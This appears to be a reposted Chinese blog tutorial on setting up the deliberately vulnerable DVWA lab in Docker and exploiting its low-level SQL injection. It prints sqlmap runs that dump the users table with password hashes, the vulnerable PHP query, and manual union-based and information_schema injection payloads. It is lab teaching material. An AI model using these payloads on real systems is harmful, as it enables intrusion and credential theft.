2019-2-17 dvwa学习-环境搭建和sql字符型注入(级别low)

编程入门 行业动态 更新时间:2024-10-25 22:31:36

DVWA全称是Damn Vulnerable Web Application,它是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

如果要完全自己搭建,可以参考这篇文章《 一起学安全测试——自己搭建安全测试环境(DVWA)》。


$ docker run -it -p 80:80 vulnerables/web-dvwa
Unable to find image 'vulnerables/web-dvwa:latest' locally
latest: Pulling from vulnerables/web-dvwa
3e17c6eae66c: Pull complete
0c57df616dbf: Pull complete
eb05d18be401: Pull complete
e9968e5981d2: Pull complete
2cd72dba8257: Pull complete
6cff5f35147f: Pull complete
098cffd43466: Pull complete
b3d64a33242d: Pull complete
Digest: sha256:dae203fe11646a86937bf04db0079adef295f426da68a92b40e3b181f337daa7
Status: Downloaded newer image for vulnerables/web-dvwa:latest
[+] Starting mysql...
[ ok ] Starting MariaDB database server: mysqld ..
[+] Starting apache
[....] Starting Apache httpd web server: apache2AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using Set the 'ServerName' directive globally to suppress this message
. ok
==> /var/log/apache2/access.log <==


点Create / Reset Database创建dvwa数据库。创建成功后会自动跳转到登录页面。

sqlmap的安装和配置参见《2019-2-16 sqlmap安装和应用》。有一篇sqlmap介绍文章《Sqlmap中文手册》,可以参考学习。

2-1. sql注入:SQL Injection。包含:找到数据库信息,表信息,数据信息。

接着在dvwa页面中选择左边导航中的“sql injection”,然后在user id中输入数字“333”,点击submit,此时可以看到如下界面。

PHPSESSID	j58548g0ejpkr8jo2k4ggjm3f2
security	low


  1. 要测试的页面只有在登录状态下才能访问,登录状态用cookie识别
  2. 想要检测是否存在cookie注入


C:\Python27\sqlmap>sqlmap.py -u "" --dbs
 ___ ___[']_____ ___ ___  {}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:59:14 /2019-02-17/

[19:59:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to ''. Do you want to follow? [Y/n] y
[19:59:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:59:24] [INFO] testing if the target URL content is stable
[19:59:24] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:59:24] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[19:59:24] [INFO] testing for SQL injection on GET parameter 'id'
[19:59:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:59:25] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:59:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:59:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:59:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:59:26] [INFO] testing 'MySQL inline queries'
[19:59:26] [INFO] testing 'PostgreSQL inline queries'
[19:59:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:59:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:59:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:59:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[19:59:27] [INFO] testing 'Oracle AND time-based blind'
[19:59:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:59:29] [WARNING] GET parameter 'id' does not seem to be injectable
[19:59:29] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[19:59:29] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[19:59:29] [INFO] testing for SQL injection on GET parameter 'Submit'
[19:59:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:59:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:59:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:59:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:59:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:59:31] [INFO] testing 'MySQL inline queries'
[19:59:31] [INFO] testing 'PostgreSQL inline queries'
[19:59:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:59:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:59:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:59:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[19:59:32] [INFO] testing 'Oracle AND time-based blind'
[19:59:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:59:35] [WARNING] GET parameter 'Submit' does not seem to be injectable
[19:59:35] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 19:59:35 /2019-02-17/


C:\Python27\sqlmap>sqlmap.py -u "" --cookie "security=low;PHPSESSID=j58548g0ejpkr8jo2k4ggjm3f2" --dbs
 ___ ___[,]_____ ___ ___  {}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:00:53 /2019-02-17/

[20:00:53] [INFO] testing connection to the target URL
[20:00:53] [INFO] testing if the target URL content is stable
[20:00:54] [INFO] target URL content is stable
[20:00:54] [INFO] testing if GET parameter 'id' is dynamic
[20:00:54] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:00:54] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:00:54] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:00:54] [INFO] testing for SQL injection on GET parameter 'id'
[20:03:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[20:03:12] [INFO] fetching database names
[20:03:12] [INFO] used SQL query returns 2 entries
[20:03:12] [INFO] retrieved: 'dvwa'
[20:03:12] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] dvwa
[*] information_schema

[20:03:12] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'


C:\Python27\sqlmap>sqlmap.py -u "" --cookie "security=low;PHPSESSID=j58548g0ejpkr8jo2k4ggjm3f2" -D dvwa --tables
 ___ ___[(]_____ ___ ___  {}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:22:08 /2019-02-17/

[20:22:09] [INFO] resuming back-end DBMS 'mysql'
[20:22:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=333' OR NOT 1476=1476#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=333' OR (SELECT 4584 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4584=4584,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zrWb&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=333' OR SLEEP(5)-- whhD&Submit=Submit
[20:22:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[20:22:09] [INFO] fetching tables for database: 'dvwa'
[20:22:09] [INFO] used SQL query returns 2 entries
[20:22:09] [INFO] retrieved: 'guestbook'
[20:22:09] [INFO] retrieved: 'users'
Database: dvwa
[2 tables]
| guestbook |
| users     |

[20:22:09] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 20:22:09 /2019-02-17/


C:\Python27\sqlmap>sqlmap.py -u "" --cookie "security=low;PHPSESSID=j58548g0ejpkr8jo2k4ggjm3f2" -D dvwa -T users --columns
 ___ ___[.]_____ ___ ___  {}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:29:04 /2019-02-17/

[20:29:05] [INFO] resuming back-end DBMS 'mysql'
[20:29:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=333' OR NOT 1476=1476#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=333' OR (SELECT 4584 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4584=4584,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zrWb&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=333' OR SLEEP(5)-- whhD&Submit=Submit
[20:29:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[20:29:05] [INFO] fetching columns for table 'users' in database 'dvwa'
[20:29:05] [INFO] used SQL query returns 8 entries
[20:29:05] [INFO] retrieved: 'user_id'
[20:29:05] [INFO] retrieved: 'int(6)'
[20:29:05] [INFO] retrieved: 'first_name'
[20:29:05] [INFO] retrieved: 'varchar(15)'
[20:29:05] [INFO] retrieved: 'last_name'
[20:29:05] [INFO] retrieved: 'varchar(15)'
[20:29:05] [INFO] retrieved: 'user'
[20:29:05] [INFO] retrieved: 'varchar(15)'
[20:29:05] [INFO] retrieved: 'password'
[20:29:05] [INFO] retrieved: 'varchar(32)'
[20:29:05] [INFO] retrieved: 'avatar'
[20:29:05] [INFO] retrieved: 'varchar(70)'
[20:29:05] [INFO] retrieved: 'last_login'
[20:29:05] [INFO] retrieved: 'timestamp'
[20:29:05] [INFO] retrieved: 'failed_login'
[20:29:05] [INFO] retrieved: 'int(3)'
Database: dvwa
Table: users
[8 columns]
| Column       | Type        |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |

[20:29:05] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 20:29:05 /2019-02-17/



C:\Python27\sqlmap>sqlmap.py -u "" --cookie "security=low;PHPSESSID=j58548g0ejpkr8jo2k4ggjm3f2" -D dvwa -T users --count
 ___ ___[)]_____ ___ ___  {}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:09 /2019-02-17/

[20:32:09] [INFO] resuming back-end DBMS 'mysql'
[20:32:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=333' OR NOT 1476=1476#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=333' OR (SELECT 4584 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4584=4584,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zrWb&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=333' OR SLEEP(5)-- whhD&Submit=Submit
[20:32:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[20:32:09] [INFO] retrieved: '5'
Database: dvwa
| Table | Entries |
| users | 5       |

[20:32:09] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output


C:\Python27\sqlmap>sqlmap.py -u "" --cookie "security=low;PHPSESSID=j58548g0ejpkr8jo2k4ggjm3f2" -D dvwa -T users --dump
 ___ ___[']_____ ___ ___  {}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:35:50 /2019-02-17/

[20:35:50] [INFO] resuming back-end DBMS 'mysql'
[20:35:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=333' OR NOT 1476=1476#&Submit=Submit
Database: dvwa
Table: users
[5 entries]
| user_id | avatar                      | user    | password                                    | last_name | first_name | last_login          | failed_login |
| 1       | /hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2019-02-17 12:20:01 | 0            |
| 2       | /hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2019-02-17 12:20:01 | 0            |
| 3       | /hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2019-02-17 12:20:01 | 0            |
| 4       | /hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7            | Picasso   | Pablo      | 2019-02-17 12:20:01 | 0            |
| 5       | /hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2019-02-17 12:20:01 | 0            |

[20:37:14] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\xxx\AppData\Local\sqlmap\output\\dump\dvwa\users.csv'
[20:37:14] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'




我们可以下载dwma的源码。解压后进入vulnerabilities\sqli\source目录,这里有3个php文件,分别对应的是low、 medium和high3个级别。


root@90e68d944bc2:/var/www/html/vulnerabilities/sqli/source# cat low.php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
        // Get input
        $id = $_REQUEST[ 'id' ];

        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Get results
        while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                $html .= "<pre>ID: {$id}<br />{$query}<br/>First name: {$first}<br />Surname: {$last}</pre>";




' union select user,password from users#


SELECT first_name, last_name FROM users WHERE user_id = '' union select user,password from users#';


root@90e68d944bc2:/var/www/html/vulnerabilities/sqli/source# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 61
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [dvwa]> SELECT first_name, last_name FROM users WHERE user_id = '' union select user,password from users#';
    -> ;
| first_name | last_name                        |
| admin      | 5f4dcc3b5aa765d61d8327deb882cf99 |
| gordonb    | e99a18c428cb38d5f260853678922e03 |
| 1337       | 8d3533d75ae2c3966d7e0d4fcc69216b |
| pablo      | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| smithy     | 5f4dcc3b5aa765d61d8327deb882cf99 |
5 rows in set (0.00 sec)


MariaDB [dvwa]> select * from users;
| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-02-18 11:43:24 |            0 |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-02-18 11:43:24 |            0 |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-02-18 11:43:24 |            0 |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-02-18 11:43:24 |            0 |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-02-18 11:43:24 |            0 |
5 rows in set (0.00 sec)


SELECT first_name, last_name FROM users WHERE user_id = '' union select user,password from users#';

现在回到界面上,在id中输入’ union select user,password from users#,然后提交,结果就是我们刚才解释的内容。注意:First name就是用户名,Surname当然就是password了。

 $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";



1' or '1'='1

可以得到类似的效果,界面如下,只不过它把所有用户的first name和last name都显示出来了。


SELECT first_name, last_name FROM users WHERE user_id = '1'';
SELECT first_name, last_name FROM users WHERE user_id = '1''';


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1


SELECT first_name, last_name FROM users WHERE user_id = '1''';



1’ order by 5# 


SELECT first_name, last_name FROM users WHERE user_id = '1’ order by 5# ';


Unknown column '5' in 'order clause'



1' union select 1,database() #




1' union select  TABLE_SCHEMA,table_name from information_schema.tables where table_schema='dvwa' #




1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#




2019-2-17 dvwa学习-环境搭建和sql字符型注入(级别low)

本文发布于:2023-06-14 04:33:00,感谢您对本站的认可!
本文标签:字符   级别   环境   sql   dvwa


评论列表 (有 0 条评论)


编程频道|电子爱好者 - 技术资讯及电子产品介绍!